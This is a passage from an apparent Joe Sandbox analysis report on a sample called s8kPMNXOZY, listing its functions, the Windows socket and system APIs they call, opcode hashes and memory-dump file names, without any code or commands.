                                                          • Opcode ID: 2289e21d3822c74bbb465c8eb0ffab59aad478702cdd2e20f079c5dae6ff58f2
                                                          • Instruction ID: 11cc51f3f896750b2ab7f8f214ba335815bba06849418adedffbad012266c20f
                                                          • Opcode Fuzzy Hash: 2289e21d3822c74bbb465c8eb0ffab59aad478702cdd2e20f079c5dae6ff58f2
                                                          • Instruction Fuzzy Hash: 8C210631818281AAF6219B18DC46FE773ACEF91328F044654FD8853052FA3269958BE2
                                                          Function 0025D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1937 25d5e0-25d5ee 1938 25d5f0-25d604 call 25d690 1937->1938 1939 25d652-25d662 WSAStartup 1937->1939 1945 25d606-25d614 1938->1945 1946 25d61b-25d651 call 267620 1938->1946 1941 25d664-25d66f 1939->1941 1942 25d670-25d676 1939->1942 1942->1938 1943 25d67c-25d68d 1942->1943 1945->1946 1951 25d616 1945->1951 1951->1946
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0025D65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: cc59e053dbb885d874c625cc7eb746edd6687590a2ae7f7f2e8373b4d0988796
                                                          • Instruction ID: 379fbe4ad6e9f1fb0ad475fa2c0bb1cfa8f125e4764aa3f38e4d3881569694bf
                                                          • Opcode Fuzzy Hash: cc59e053dbb885d874c625cc7eb746edd6687590a2ae7f7f2e8373b4d0988796
                                                          • Instruction Fuzzy Hash: FA019EE0E6434206F720BF38BD2B76536E85B91305F84542CEC88A11C2F73CC6ADC192
                                                          Function 002478B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: 6a909cd560d30f165c903a0c5d2eeeba5234588e8ac33b588785f49360a807f8
                                                          • Instruction ID: 1cc05c0cd2561777138fda171261aeed770f998c9c08ec381ec401ea8c027a1b
                                                          • Opcode Fuzzy Hash: 6a909cd560d30f165c903a0c5d2eeeba5234588e8ac33b588785f49360a807f8
                                                          • Instruction Fuzzy Hash: 10D0A733A192317B8530A9997C4DC8B7BA8DDCAF60F064D68FD5077204D2309C1487F2
                                                          Function 0030B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0030B29E,?,00000000,?,?), ref: 0030B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,002F3C41,00000000), ref: 0030B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: 04b931688dc58349dbfa0651e99e2b0cd49d9df7d6bbba63e597488ef314eb4e
                                                          • Instruction ID: dede559de5e59564ad169a2fc8c0bb454e248178e9f463c22f919d9a241c6245
                                                          • Opcode Fuzzy Hash: 04b931688dc58349dbfa0651e99e2b0cd49d9df7d6bbba63e597488ef314eb4e
                                                          • Instruction Fuzzy Hash: E70124363052019BCA215A688C94FABF399FF88364F050B24F978A31E0D726ED008752
                                                          Function 0030AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0030AFD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: f9f6cc50f7dcea4c54e711e32aff7e44b074823186ed4292f8f403acc902277b
                                                          • Instruction ID: 5c61e4d57c20eb097b8dd0c59fbad6f4231322e9966e1361ee77da8dcc90bfd0
                                                          • Opcode Fuzzy Hash: f9f6cc50f7dcea4c54e711e32aff7e44b074823186ed4292f8f403acc902277b
                                                          • Instruction Fuzzy Hash: 6C116670808B8596EB268F1CD8027E6F3F4EFD0329F109619E59942550F7765AC58BC2
                                                          Function 0030A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0030A97E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: 7db9cf14b27fe35bd6a7d68674a31f011f61c8627ba80377e2801c8ed90e2847
                                                          • Instruction ID: c7cc477edc55dcef8f9bf679ab06820d205e2c5e804a426edd4859ec728089e9
                                                          • Opcode Fuzzy Hash: 7db9cf14b27fe35bd6a7d68674a31f011f61c8627ba80377e2801c8ed90e2847
                                                          • Instruction Fuzzy Hash: 7601A272B01B14AFC6148F25EC45B5AB7A5EF84720F068669EA982B3A1C331AC118BD1
                                                          Function 0030AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,0030B280,00000000,-00000001,00000000,0030B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0030AF66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 2958674f9247e3c44d6402256cc3db90ba83d040a8b66e8bb53562cfb076c809
                                                          • Instruction ID: ee7dd63f300eb75f58c2aba26bc766dde0ba34c366bcd24e0a004947d8f36872
                                                          • Opcode Fuzzy Hash: 2958674f9247e3c44d6402256cc3db90ba83d040a8b66e8bb53562cfb076c809
                                                          • Instruction Fuzzy Hash: BCE0EDB2A057216BD6659A58FC449ABF3A9EFC4B20F054A49BC5467204C330AC508BE2
                                                          Function 0030B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • closesocket.WS2_32(?,00309422,?,?,?,?,?,?,?,?,?,?,?,w3/,006D4C60,00000000), ref: 0030B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: 476e2a87d33834955740efa88cf7ccd9d6ef6569ef76b95c32d92b4c577729b8
                                                          • Instruction ID: cb1c46bb5694e27afb791c62f0e701c6fd85b7c7648af4782acb411ebf655102
                                                          • Opcode Fuzzy Hash: 476e2a87d33834955740efa88cf7ccd9d6ef6569ef76b95c32d92b4c577729b8
                                                          • Instruction Fuzzy Hash: BCD0C27430020157CA208A14C894A57B22B7FC0310FAACB68E02C4A590C73BCC438601
                                                          Function 002A67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0027AF56,?,00000001), ref: 002A67FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: 97e72dbe4c8bba161a0438c6d78b419a9235ef456c2a600e5fdabbc3e30146b0
                                                          • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                                          • Opcode Fuzzy Hash: 97e72dbe4c8bba161a0438c6d78b419a9235ef456c2a600e5fdabbc3e30146b0
                                                          • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
                                                          Function 002431D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 0ba154512fa4093483453a8bba26f2778cd668aa9c6b0149b94dd5d2c996a95a
                                                          • Instruction ID: fb0fbea663d081c227d723c1eef78308f4e778891c691bf2296eded299d54d93
                                                          • Opcode Fuzzy Hash: 0ba154512fa4093483453a8bba26f2778cd668aa9c6b0149b94dd5d2c996a95a
                                                          • Instruction Fuzzy Hash: 773194B49093059FCB40EFB8C5896AEBBF4FF44344F00896DE899A7241E7749A44DF92
                                                          Function 005CB180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 4cc48e05577b1c3649a54e7d6167a891443e5c9784d9b0a227baff333d540fc5
                                                          • Instruction ID: ffb8aeb65a2d2092ef532b836fe8edc59f314cd359d22193c2bf5fa25b874b62
                                                          • Opcode Fuzzy Hash: 4cc48e05577b1c3649a54e7d6167a891443e5c9784d9b0a227baff333d540fc5
                                                          • Instruction Fuzzy Hash: 99C08CA0D0034442D740BA38854611D79E43740104FC01B68988496080F72883288263

                                                          Non-executed Functions

                                                          Function 00281BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
